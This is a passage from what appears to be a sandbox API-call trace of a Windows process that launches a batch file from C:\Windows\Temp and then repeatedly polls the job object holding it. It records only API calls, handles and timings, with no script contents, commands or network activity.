lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x105, lpBuffer=0xb156f8ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x0) returned 0x20 [0173.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d2b0) returned 1 [0173.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d390 | out: lpFileInformation=0xb156f8d390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f3c25e5, ftCreationTime.dwHighDateTime=0x1da9886, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f4a7656, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x6d9ee)) returned 1 [0173.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d270) returned 1 [0173.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x105, lpBuffer=0xb156f8cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x0) returned 0x20 [0173.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d240) returned 1 [0173.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d320 | out: lpFileInformation=0xb156f8d320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f3c25e5, ftCreationTime.dwHighDateTime=0x1da9886, ftLastAccessTime.dwLowDateTime=0x3f3c25e5, ftLastAccessTime.dwHighDateTime=0x1da9886, ftLastWriteTime.dwLowDateTime=0x3f4a7656, ftLastWriteTime.dwHighDateTime=0x1da9886, nFileSizeHigh=0x0, nFileSizeLow=0x6d9ee)) returned 1 [0173.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d200) returned 1 [0173.096] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0173.117] LocalAlloc (uFlags=0x0, uBytes=0x42) returned 0x1e351a74e30 [0173.117] LocalAlloc (uFlags=0x0, uBytes=0x6) returned 0x1e35112bb40 [0173.117] LocalAlloc (uFlags=0x0, uBytes=0x28) returned 0x1e3512afa70 [0173.119] ShellExecuteExW (in: pExecInfo=0x1e339e41a88*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\Temp\\MAS_15344413.cmd", lpParameters=" ", lpDirectory="C:\\Windows\\system32", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x1e339e41a88*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\Temp\\MAS_15344413.cmd", lpParameters=" ", lpDirectory="C:\\Windows\\system32", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0xa88)) returned 1 [0173.307] LocalFree (hMem=0x1e351a74e30) returned 0x0 [0173.307] LocalFree (hMem=0x1e35112bb40) returned 0x0 [0173.308] LocalFree (hMem=0x1e3512afa70) returned 0x0 [0173.311] GetExitCodeProcess (in: hProcess=0xa88, lpExitCode=0xb156f8d668 | out: lpExitCode=0xb156f8d668*=0x103) returned 1 [0173.314] GetCurrentProcess () returned 0xffffffffffffffff [0173.314] GetCurrentProcess () returned 0xffffffffffffffff [0173.315] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xa88, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xb156f8d550, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xb156f8d550*=0xa08) returned 1 [0173.317] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0xb156f8d400*=0xa08, lpdwindex=0xb156f8d1d4 | out: lpdwindex=0xb156f8d1d4) returned 0x80010115 [0173.325] CloseHandle (hObject=0xa08) returned 1 [0173.325] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa08 [0173.331] CreateJobObjectW (lpJobAttributes=0x0, lpName=0x0) returned 0xa04 [0173.333] AssignProcessToJobObject (hJob=0xa04, hProcess=0xa88) returned 1 [0173.335] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb156f8d448 | out: UnbiasedTime=0xb156f8d448) returned 1 [0173.368] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb156f8d448 | out: UnbiasedTime=0xb156f8d448) returned 1 [0173.368] CoWaitForMultipleHandles (dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8d400*=0xa08, lpdwindex=0xb156f8d1d4) Thread: id = 18 os_tid = 0x135c Thread: id = 19 os_tid = 0xba8 [0138.991] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0138.992] CoGetContextToken (in: pToken=0xb15708f5b0 | out: pToken=0xb15708f5b0) returned 0x0 [0138.992] CObjectContext::QueryInterface () returned 0x0 [0138.992] CObjectContext::GetCurrentThreadType () returned 0x0 [0138.992] Release () returned 0x0 [0138.992] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0138.992] CoUninitialize () [0138.992] RoInitialize () returned 0x1 [0138.992] RoUninitialize () returned 0x0 [0175.846] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0175.846] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0175.846] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0177.957] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0177.958] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0177.958] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0180.008] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0180.009] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0180.010] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0182.054] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0182.055] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0182.055] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0186.114] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0186.114] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0186.114] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0188.186] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0188.186] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0188.186] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0190.206] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0190.206] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0190.207] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0192.278] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0192.278] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0192.278] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0194.308] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0194.308] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0194.309] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0196.337] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0196.337] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0196.337] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0198.358] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0198.358] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0198.358] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0202.428] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0202.428] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0202.429] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0204.460] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0204.460] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0204.460] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0206.490] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0206.490] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0206.490] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0208.508] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0208.508] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0208.508] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0210.540] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0210.540] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0210.540] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0212.623] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0212.623] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0212.624] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0214.697] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0214.698] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0214.698] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0218.763] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0218.763] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0218.763] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0220.787] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0220.787] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0220.787] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0222.825] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0222.825] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0222.825] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0224.854] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0224.854] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0224.854] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0226.965] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0226.965] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0226.965] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0228.989] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0228.989] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0228.990] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0231.061] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0231.061] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0231.061] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0237.281] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0237.281] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0237.281] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0239.318] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0239.318] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0239.318] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0241.344] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0241.344] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0241.345] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0243.374] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0243.375] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0243.375] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0245.406] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0245.406] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0245.406] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0247.443] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0247.443] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0247.443] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0249.474] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0249.474] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0249.474] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0253.672] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0253.673] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0253.673] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0255.700] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0255.700] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0255.700] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0257.738] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0257.739] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0257.739] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0259.761] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0259.762] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0259.762] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0261.789] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0261.789] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0261.789] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0263.810] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0263.810] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0263.810] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0265.843] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0265.843] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0265.844] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0271.942] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0271.942] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0271.942] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0273.968] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0273.968] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0273.968] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0275.994] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0275.995] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0275.995] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0278.017] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0278.017] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0278.017] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0280.038] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0280.038] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0280.038] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0282.147] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0282.147] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0282.148] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, 